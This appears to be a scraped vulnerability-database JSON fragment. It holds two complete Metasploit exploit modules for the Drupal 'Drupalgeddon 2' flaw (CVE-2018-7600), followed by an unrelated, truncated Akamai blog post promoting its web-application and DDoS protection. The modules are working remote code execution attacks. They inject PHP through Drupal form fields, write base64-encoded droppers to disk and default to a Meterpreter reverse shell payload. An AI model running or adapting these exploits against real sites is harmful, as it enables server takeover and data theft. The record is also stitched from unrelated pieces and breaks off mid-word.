"cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "1337DAY-ID-30268", "href": "https://0day.today/exploit/description/30268", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 7.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 7.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 7.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 7.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 7.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('7.x'),\r\n 'Type' => :linux_dropper\r\n ],\r\n #\r\n # Drupal 8.x targets (PHP, cmd/unix, native)\r\n #\r\n ['Drupal 8.x (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_memory\r\n ],\r\n ['Drupal 8.x (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :php_dropper\r\n ],\r\n ['Drupal 8.x (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :unix_memory\r\n ],\r\n ['Drupal 8.x (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Version' => Gem::Version.new('8.x'),\r\n 'Type' => :linux_dropper\r\n ]\r\n ],\r\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\r\n 'DefaultOptions' => {'WfsDelay' => 2}\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),\r\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\r\n OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n checkcode = CheckCode::Safe\r\n\r\n if drupal_version\r\n print_status(\"Drupal #{@version} targeted at #{full_uri}\")\r\n checkcode = CheckCode::Detected\r\n else\r\n print_error('Could not determine Drupal version to target')\r\n return CheckCode::Unknown\r\n end\r\n\r\n if drupal_unpatched?\r\n print_good('Drupal appears unpatched in CHANGELOG.txt')\r\n checkcode = CheckCode::Appears\r\n end\r\n\r\n token = random_crap\r\n res = execute_command(token, func: 'printf')\r\n\r\n if res && res.body.start_with?(token)\r\n checkcode = CheckCode::Vulnerable\r\n end\r\n\r\n checkcode\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\r\n # XXX: Naughty datastore modification\r\n datastore['DUMP_OUTPUT'] = true\r\n end\r\n\r\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\r\n case target['Type']\r\n when :php_memory\r\n execute_command(payload.encoded, func: 'assert')\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # XXX: This will spawn a *very* obvious process\r\n execute_command(\"php -r '#{payload.encoded}'\")\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :php_dropper, :linux_dropper\r\n dropper_assert\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n dropper_exec\r\n end\r\n end\r\n\r\n def dropper_assert\r\n php_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{random_crap}.php\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # Stage 1 decodes the PHP and writes it to disk\r\n stage1 = %Q{\r\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\r\n }\r\n\r\n # Stage 2 executes said PHP in-process\r\n stage2 = %Q{\r\n include_once(\"#{php_file}\");\r\n }\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Hopefully pop our shell with assert()\r\n execute_command(stage1.strip, func: 'assert')\r\n execute_command(stage2.strip, func: 'assert')\r\n end\r\n\r\n def dropper_exec\r\n php_file = \"#{random_crap}.php\"\r\n tmp_file = Pathname.new(\r\n \"#{datastore['WritableDir']}/#{php_file}\"\r\n ).cleanpath\r\n\r\n # Return the PHP payload or a PHP binary dropper\r\n dropper = get_write_exec_payload(\r\n writable_path: datastore['WritableDir'],\r\n unlink_self: true # Worth a shot\r\n )\r\n\r\n # Encode away potential badchars with Base64\r\n dropper = Rex::Text.encode_base64(dropper)\r\n\r\n # :unlink_self may not work, so let's make sure\r\n register_file_for_cleanup(php_file)\r\n\r\n # Write the payload or dropper to disk (!)\r\n # NOTE: Analysis indicates > is a badchar for 8.x\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\r\n\r\n # Attempt in-process execution of our PHP script\r\n send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, php_file)\r\n )\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n # Try to get a shell with PHP CLI\r\n execute_command(\"php #{php_file}\")\r\n\r\n sleep(wfs_delay)\r\n return if session_created?\r\n\r\n register_file_for_cleanup(tmp_file)\r\n\r\n # Fall back on our temp file\r\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\r\n execute_command(\"php #{tmp_file}\")\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\r\n\r\n vprint_status(\"Executing with #{func}(): #{cmd}\")\r\n\r\n res =\r\n case @version.to_s\r\n when '7.x'\r\n exploit_drupal7(func, cmd)\r\n when '8.x'\r\n exploit_drupal8(func, cmd)\r\n end\r\n\r\n if res && res.code != 200\r\n print_error(\"Unexpected reply: #{res.inspect}\")\r\n return\r\n end\r\n\r\n if res && datastore['DUMP_OUTPUT']\r\n print_line(res.body)\r\n end\r\n\r\n res\r\n end\r\n\r\n def drupal_version\r\n if target['Version']\r\n @version = target['Version']\r\n return @version\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n # Check for an X-Generator header\r\n @version =\r\n case res.headers['X-Generator']\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n\r\n return @version if @version\r\n\r\n # Check for a <meta> tag\r\n generator = res.get_html_document.at(\r\n '//meta[@name = \"Generator\"]/@content'\r\n )\r\n\r\n return unless generator\r\n\r\n @version =\r\n case generator.value\r\n when /Drupal 7/\r\n Gem::Version.new('7.x')\r\n when /Drupal 8/\r\n Gem::Version.new('8.x')\r\n end\r\n end\r\n\r\n def drupal_unpatched?\r\n unpatched = true\r\n\r\n # Check for patch level in CHANGELOG.txt\r\n uri =\r\n case @version.to_s\r\n when '7.x'\r\n normalize_uri(target_uri.path, 'CHANGELOG.txt')\r\n when '8.x'\r\n normalize_uri(target_uri.path, 'core/CHANGELOG.txt')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n )\r\n\r\n return unless res && res.code == 200\r\n\r\n if res.body.include?('SA-CORE-2018-002')\r\n unpatched = false\r\n end\r\n\r\n unpatched\r\n end\r\n\r\n def exploit_drupal7(func, code)\r\n vars_get = {\r\n 'q' => 'user/password',\r\n 'name[#post_render][]' => func,\r\n 'name[#markup]' => code,\r\n 'name[#type]' => 'markup'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_pass',\r\n '_triggering_element_name' => 'name'\r\n }\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n\r\n return res unless res && res.code == 200\r\n\r\n form_build_id = res.get_html_document.at(\r\n '//input[@name = \"form_build_id\"]/@value'\r\n )\r\n\r\n return res unless form_build_id\r\n\r\n vars_get = {\r\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\r\n }\r\n\r\n vars_post = {\r\n 'form_build_id' => form_build_id.value\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def exploit_drupal8(func, code)\r\n # Clean URLs are enabled by default and \"can't\" be disabled\r\n uri = normalize_uri(target_uri.path, 'user/register')\r\n\r\n vars_get = {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => 1,\r\n '_wrapper_format' => 'drupal_ajax'\r\n }\r\n\r\n vars_post = {\r\n 'form_id' => 'user_register_form',\r\n '_drupal_ajax' => 1,\r\n 'mail[#type]' => 'markup',\r\n 'mail[#post_render][]' => func,\r\n 'mail[#markup]' => code\r\n }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_get' => vars_get,\r\n 'vars_post' => vars_post\r\n )\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(8..42)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-26] #", "sourceHref": "https://0day.today/exploit/30268", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-18T03:54:57", "description": "Exploit for php platform in category remote exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30199", "href": "https://0day.today/exploit/description/30199", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon2',\r\n 'Description' => %q{\r\n CVE-2018-7600 / SA-CORE-2018-002\r\n Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\r\n allows remote attackers to execute arbitrary code because of an issue affecting\r\n multiple subsystems with default or common module configurations.\r\n \r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n \r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Vitalii Rudnykh', # initial PoC\r\n 'Hans Topo', # further research and ruby port\r\n 'Jos\u00e9 Ignacio Rojo' # further research and msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-002'],\r\n ['CVE', '2018-7600'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 15 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n \r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n \r\n def exploit_user_register\r\n data = Rex::MIME::Message.new\r\n data.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"')\r\n data.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"')\r\n data.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"')\r\n data.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"')\r\n post_data = data.to_s\r\n \r\n # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => \"#{uri_path}user/register\",\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'element_parents' => 'account/mail/#value',\r\n 'ajax_form' => '1',\r\n '_wrapper_format' => 'drupal_ajax',\r\n }\r\n })\r\n end\r\n \r\n ##\r\n # Main\r\n ##\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n exploit_user_register\r\n else\r\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\r\n end\r\n end\r\n end\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30199", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2020-09-09T13:53:38", "description": "SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both [web application security risks](<https://owasp.org/www-project-top-ten/>) and [API security threats](<https://owasp.org/www-project-api-security/>). \n\nFor Akamai customers, SQL injections comprised 76% of all web application attacks detected over the past two years.\n\nThe reasons why SQL injections remain a challenge in 2020 are the same as those that have driven the growth of the World Wide Web ([and Akamai with it](<https://www.streamingmediablog.com/2020/08/akamai-milestone.html>)) over the past two decades:\n\n * There is more information online than ever before, including [information that has financial value](<https://content.akamai.com/PG2564-Weighing-Risk-Against-Data-Breach.html>), and is therefore a target for attackers\n * The number of web applications is rapidly growing, and Akamai customers often have hundreds of applications that collectively represent their digital experience\n * Web applications have become highly complex, with many different components and technologies; the first-party and open source code in apps pose growing vulnerabilities, as do the many connections between services -- all of which can be exploited at any weak point\n * Developers don't always think about security, and security teams aren't able to keep up with the increasing number of complex applications they're chartered to protect\n\nAll of these factors contribute to security teams having difficulty keeping security up to date in constantly changing apps. But that's only half of the equation. Rapid iteration also creates a steady stream of possible new vulnerabilities and attack vectors designed to exploit them.\n\n### DDoS Protection Starts with Zero-Second Mitigation\n\nMost customers start their [web application and API protection (WAAP)](<https://www.gartner.com/en/documents/3903064/defining-cloud-web-application-and-api-protection-servic>) journey with distributed denial-of-service (DDoS) protection. After all, applications need to be available before there's any worry about a data breach.\n\n[](<https://blogs.akamai.com/DDoSBlog1-thumb-700x505-10718.jpg>)\n\nFrom [Operation Ababil](<https://www.akamai.com/us/en/about/news/press/2013-press/akamai-third-quarter-2012-state-of-the-internet-report.jsp>) to [Memcached](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-summer-2018-web-attack-report.pdf?mkt_tok=eyJpIjoiTm1JeU56SmhaVEV5TkRWaSIsInQiOiI2MVlld2w4NHBSSHJ5SGFVU2I2Y3hLZkxyREFYaEdZdmpBSGh6TjVOVk40eG1CRlZRbFlNNWpKNUVQOU0wRGdhNnVOSW02SUVnSnNmUmZHM0VPRG5BMHNUNGV2bnFZbEhielNYTzFaRlwvQlQxMEFHNzQrWlhHc1hJVTVzbk55ZXgifQ%3D%3D>), the common thread between Akamai's DDoS mitigation services has always been instant mitigation for attacks, backed by an industry-leading zero-second time-to-mitigate service-level agreement (SLA). From the beginning, Akamai designed its CDN as a reverse HTTP/S proxy that instantly drops all network-layer attacks, which make up the vast majority of all DDoS attacks. \n\nLikewise, our authoritative DNS service drops all traffic that is not on port 53 in zero seconds. [Prolexic Routed](<https://www.akamai.com/us/en/products/security/prolexic-solutions.jsp>) introduced a similar capability in 2013, with [proactive mitigation controls](<https://www.akamai.com/us/en/multimedia/documents/white-paper/proactive-ddos-mitigation-with-prolexic-mitigation-controls-whitepaper.pdf>) tailored to each customer's network profile. Prolexic Routed was also responsible for mitigating the record-setting [1.3 Tbps Memcached attack in February 2018](<https://blogs.akamai.com/2018/03/memcached-fueled-13-tbps-attacks.html>) and [809 Mpps attack in June 2020](<https://blogs.akamai.com/2020/06/largest-ever-recorded-packet-per-secondbased-ddos-attack-mitigated-by-akamai.html>).\n\nThe ability to mitigate even the largest attacks in zero seconds is unique in the industry. Starting with proactive mitigation provides the fastest and most effective method for mitigating the majority of DDoS attacks -- without any additional analysis required. This is especially critical with the DDoS landscape of 2020, where short \"hit and run\" attacks and [large-scale attacks comprising multiple attack vectors](<https://blogs.akamai.com/security/index2.html>) are increasing in prevalence. \n\nBoth of these trends increase the challenges of analyzing attack behavior and applying appropriate mitigation controls quickly. Defining and dropping abnormal traffic upfront provides a better experience for customers and allows Akamai's Security Operations Command Center (SOCC) staff to focus on attacks that require manual analysis and mitigation.\n\n### Demand More from Your WAF\n\nWeb application attacks such as SQL injection pose very different challenges. How do you protect all of your web applications when a) you don't have enough application security staff or expertise and b) the applications themselves are constantly growing and changing? \n\nThe following principles have guided Akamai's web application firewall (WAF) development since 2009, when we introduced the industry's first edge WAF:\n\n * **Reduce the number of things that require management.** \nMoving to an edge-based deployment model allows you to manage your global WAF configuration with a single interface, instead of having to configure dozens of appliances with every rule change.\n * **Look for anomalies, not Common Vulnerabilities and Exposures (CVEs). ** \nA CVE-based approach to WAF rules is unwieldy to manage and never gets ahead of the problem. Architecting the WAF around an anomaly scoring engine makes it easier to scale and has been [proven effective against some zero-day vulnerabilities](<https://blogs.akamai.com/sitr/2018/08/-attack-status-apache-struts-vulnerability-cve-2018-11776.html>).\n * **Curate WAF rules for customers.** \nThe most recent [Forrester Wave report on WAFs](<https://www.akamai.com/us/en/campaign/assets/reports/forrester-waf-wave-q1-2020.jsp>) gave high marks to Akamai's internal threat intelligence. Most organizations don't have enough security resources to manage a WAF over time. Akamai threat researchers help by continuously updating and testing WAF rules against live traffic to make enablement easier for customers.\n * **Leverage machine learning where it makes sense.** \nMost security teams won't trust an algorithm to update their WAF rules. Instead, Akamai uses machine learning to analyze live traffic (including 178 billion rule triggers a day) to identify anomalies requiring analysis by Akamai threat researchers.\n * **Automate as much as you can.** \nBecause of limited resources, most customers only protect their most critical applications, leaving many applications unprotected. Akamai developed [automated protections](<https://developer.akamai.com/blog/2018/10/10/quickly-protect-your-website-automatically-updated-waf-policies>) to protect the rest of the application footprint with a one-time click.\n * **Apply protection based on risk.** \nA reputation-based approach is a common example of protection-based risk. However, it is more effective to go beyond a simple binary score to provide a more accurate risk assessment. This can be done by creating [tailored risk scores based on attacker behavior against other customers and industries](<https://www.akamai.com/us/en/multimedia/documents/white-paper/5-phases-of-custom-risk-scoring.pdf>). In October, we'll be talking more about how to go beyond IP reputation and adapt WAF protections based on risk -- [stay tuned](<https://blogs.akamai.com/>).\n\n### [](<https://blogs.akamai.com/waf_daily_attacks_2019-06-01_2020-05-31.jpg>)API Security for Agile Organizations \n\n\n[API security](<https://www.akamai.com/uk/en/solutions/performance/api-security.jsp>) provides an industry-wide lesson on the need to provide a bridge between security teams and developers. Akamai introduced a positive security model for API protection in 2017, allowing customers to define API endpoints with Akamai to drop abnormal traffic and apply web application firewall (WAF) inspection. However, this required security teams to have visibility into the APIs developers are creating, which has proven challenging for most organizations. To help bridge that gap, Akamai recommends that API security does the following:\n\n * **Automatically inspect all API traffic.** \nAkamai now [automatically inspects all XML and JSON traffic](<https://blogs.akamai.com/2019/03/automated-api-protection-with-wap.html>) for web application attacks without requiring APIs to be defined and registered with Akamai. \n\n * **Automatically discover new API endpoints.** \nIn October, we'll be talking about an exciting new capability that will finally allow security teams to keep up with changing APIs by discovering API endpoints and their definitions -- integrated with WAF protections. Stay tuned and check [our blog](<https://blogs.akamai.com/>) for updates.\n\n### Detecting 12 Billion Bot Requests Daily \n\n\nUnlike DDoS and web application attacks, where attacks can often be identified based on traffic volume or signature, bot attacks have always attempted to blend with human traffic to go undetected. In addition, the more sophisticated bot operators continuously evolve in their attempts to evade detections. \n\nThis has driven a major shift in how the industry has approached the problem. Akamai recommends the following practices:\n\n * **Leverage signature-based rules.** \nBasic bot detection looks like a WAF, with rules based on bot signatures. These basic detections can still easily detect \"dumb bots\" comprising more than 50% of bot traffic, allowing advanced detections to focus on more sophisticated bots.\n * **Look for anomalies, not attacks. ** \nAs bots continue to better mimic human behavior, identifying sophisticated bots requires dropping all preconceived notions of what a bot may look like. Instead, machine learning algorithms such as [adaptive anomaly clustering](<https://blogs.akamai.com/2019/03/bot-manager-staying-ahead-of-the-bot-landscape.html>) look for anomalies in traffic and signals collected from the 1.3 billion devices that Akamai sees daily. \n\n * **Trust machine learning findings that review a lot of data. ** \nDetecting bots requires an algorithmic approach to correlating signals across different applications and customers in real time. However, machine learning requires lots of data to ensure accuracy. Akamai feeds signals from unmatched volumes of first-party data -- 1.3 billion unique clients per day and hundreds of Tbps of traffic -- into our machine learning algorithms to detect 12 billion bot requests and 280 million bot logins every day.\n * **Manage, don't mitigate.** \nWhile bots may be easy to block, bot management remains a cat-and-mouse game between attackers and security vendors. Unlike traditional tools, Akamai's inline architecture provides a wide array of response options to help manage the long-term impacts of bots.\n\n### The Newest Frontier: In-Browser Threats \n\n\n[Magecart-style attacks](<https://blogs.akamai.com/sitr/2018/11/an-introduction-to-magecart.html>) started hitting the mainstream in 2018, with major breaches at Ticketmaster, Newegg, and British Airways. These attacks are characterized by the ability to compromise scripts running on modern web pages. \n\nThese new types of attacks prove that new attack vectors will continue to be discovered as underlying applications continue to change. In response, security technology will continue to evolve as well. \n\nFor in-browser threats like Magecart, Akamai has shifted its approach again to:\n\n * **Protect in the browser, not in the application.** \nMagecart-style attacks occur in every client's browser, invisible to traditional security tools. Detecting and mitigating compromised scripts running in the browser require implementing [protection](<https://www.akamai.com/us/en/products/security/page-integrity-manager.jsp>) into the browser.\n * **Continuously monitor script behavior. ** \nSophisticated script attacks can be executed in a fraction of a second and gone before you notice them. Akamai's unique approach continuously monitors script behavior, allowing you to catch even transient threats.\n * **Look for anomalies even in legitimate scripts. ** \nWith malicious code injected into compromised scripts, in-browser threat protection must identify unusual changes in behavior even for well-known, legitimate scripts.\n\nFrom SQL injections to Magecart, the challenge of protecting web applications and APIs will continue to grow -- with new attack vectors to protect against as well as changing applications. Navigating the evolving threat landscape requires an expanding kit of tools, solutions, and vendors to reduce the risk of doing business online. \n\n\n### Beyond WAAP: Enterprise and Carrier Security\n\nWhile often the most high-profile targets, data breaches are not limited to web applications. [Gartner's secure access service edge (SASE)](<https://blogs.akamai.com/2019/11/security-at-the-edge-what-is-gartners-sase-why-does-it-matter.html>) provides organizations with a broader framework through which to think through your security approach, including [secure web gateway (SWG)](<https://blogs.akamai.com/2020/03/akamai-enhances-enterprise-threat-protector-to-add-secure-web-gateway-capabilities.html>), [Zero Trust Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>), and [DNS security](<https://www.akamai.com/us/en/solutions/security/dns-security-services.jsp>). Every organization should evaluate their full needs and map to different approaches as well as potential solutions. For more information on these markets and more, please see:\n\n * [2019 Gartner Magic Quadrant for Web Application Firewalls](<https://www.akamai.com/us/en/campaign/assets/reports/2019-gartner-magic-quadrant-for-web-application-firewalls.jsp>)\n * [2019 Gartner Critical Capabilities for Web Application Firewall Services](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-waf-critical-capabilities-report-2019.jsp>)\n * [Forrester Wave\u2122: Ze